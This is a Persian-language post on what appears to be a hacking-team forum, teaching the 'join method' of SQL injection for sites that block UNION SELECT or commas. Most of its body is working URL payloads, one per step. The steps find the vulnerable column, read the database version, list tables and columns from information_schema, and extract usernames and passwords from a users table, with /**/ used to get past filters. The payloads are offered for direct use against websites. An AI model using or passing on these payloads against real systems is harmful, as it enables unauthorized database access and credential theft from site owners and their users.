رفتن به مطلب
انجمن تیم امنیتی گارد ایران

ارسال های توصیه شده

با سلام خدمت شما کاربران عزیز انجمن گارد ایران 

در این پست می خواهم متد join رو در باگ sql injection  به شما آموزش بدهم . 

------------------------

موارد قابل استفاده

۱- مواجه شدن با خطا زمان استفاده از union select 

۲- مواجه شدن با خطای : 'Unknown column ‘activo’ in ‘field list

۳- زمانی که سایت به عدد حساس است . 

۴- و....

------------------------

نکته :‌ در بیشتر سایت هایی که از متد join استفاده می شود سایت به + و یا به فاصله حساس است و شما به جای فاصله باید از 

/**/

استفاده کنید که من برای راحتی شما عزیزان فایلی را قرار دادم که در متد join به جای فاصله ها از /**/ استفاده شده . 

------------------------

نحوه استفاده از متد join :‌

----------------------------------------

( برای مثال تعداد تیبل های سایت ۵ تا می باشد. )

مرحله اول بیرون کشیدن ستون آسیب پذیر :‌

+union+select+*from (select 1)a join (select 2)b join (select 3)c join (select 4)d join (select 5)e%23+

و همینطور تا اخر یعنی a و b و c باید کنار ( مقدار  select ) قرار داشته باشند و مثلا ۱ می شود a و ۲ می شود b و به همین صورت و بین هر کدام یک join زمانی که به اخر رسدید دیگه join نمی خواهد و اینکه در اول باید بنویسید :    from *

توجه داشته باشید که هر عدد تبدیل شده است به یک سلکت (مقدار عدد ) ، یک حرف و join

----------------------------------------

( برای مثال در خروجی ستون ۲ را نشان می دهد و ستون ۲  آسیب پذیر است. ) 

مرحله دوم بدست آوردن ورژن

+union+select+*from (select 1)a+join+(select version())b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23

 

----------------------------------------

مرحله سوم بیرون کشیدن جدول (table) های دیتابیس (و محدود سازی تیبل ها برای نشان ندادن تیبل های سیستمی ) :

union+select+*from+(select 1)a+join+(select+group_concat((table_name)+separator+0x3c62723e)+from+information_schema.tables+where+table_schema=database)b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+

توجه داشته باشید در بیشتر سایت ها سایت به , حساس است به همین دلیل ما از متد separator برای مرتب سازی تیبل ها و تگ <br> استفاده کردیم

و شما در صورت لزوم می توانید آن بخش هایی که بکگراند سفید دارند را حذف کنید .

----------------------------------------

( برای مثال در بین تیبل ها تیبل msa_users وجود دارد  . ) 

مرحله چهارم بیرون کشیدن ستون های یک تیبل 

union+select+*from+(select 1)a+join+(select+group_concat(column_name)+from+information_schema.columns+where+table_name+like+'msa_users')b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+

به جای msa_users نام تیبل مهم خود را بنویسید و می توانید برای مرتب سازی ستون ها از متد separator مانند مرحله سوم استفاده کنید  .

ما از متد like هم استفاده کردیم و اینکه توجه داشته باشید که بیشتر مراحل مثل یونیم بیس هست .

----------------------------------------

( برای مثال در خروجی ستون های user و pass مهم است . ) 

مرحله پنجم بیرون کشیدن اطلاعات در ستون های یک تیبل 

union+select+*from+(select 1)a+join+(select+group_concat(user using ascii)+from+'msa_users')b+join+(select 3)c+join+(select 4)d+join+(select 5)e%23+

به جای msa_users نام تیبل مهم خود را بنویسید و به جای user نام ستون مهم خود را بنویسید. 

می توانید برای مرتب سازی یوزرنیم ها از متد separator مانند مرحله سوم استفاده کنید.

و اینکه این یک بار برای یوزرنیم بود و برای پسورد به جای user می نویسید pass ( نام ستون مهم که مربوط به pass است )

 

----------------------------------------

 

امید وارم از این پست لذت کافی رو برده باشید و پست رو به خوبی تمام کرده باشم و اینکه در متد join یک نکته های مونده که باید بگویم 

برای پیچیده نشدن پست نگفتم و حتما در پست بعدی توضیح می دهم منتظر کامنت های شما هستم . 

هر گونه سوال در مورد پست داشتید بپرسید .

 

********* MR.MSA **********

 

 

 

 

Join method in sql injection.txt

لینک به دیدگاه
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری
 اشتراک گذاری

انجمن تیم امنیتی گارد ایران

تیم امنیتی گارد ایران یک گروه مستقل است که قوانین آن با خط مشی جمهوری اسلامی ایران مغایرت ندارد. تیم امنیتی گارد ایران از سال 1393 فعالیت خود را آغاز کرد و هدف این تیم تامین امنیت سایت ها و سرورهای ایرانی است. تیم ما همیشه برای دفاع از مرزهای سایبری سرزمین عزیزمان ایران آماده است.

شبکه های اجتماعی

×
×
  • اضافه کردن...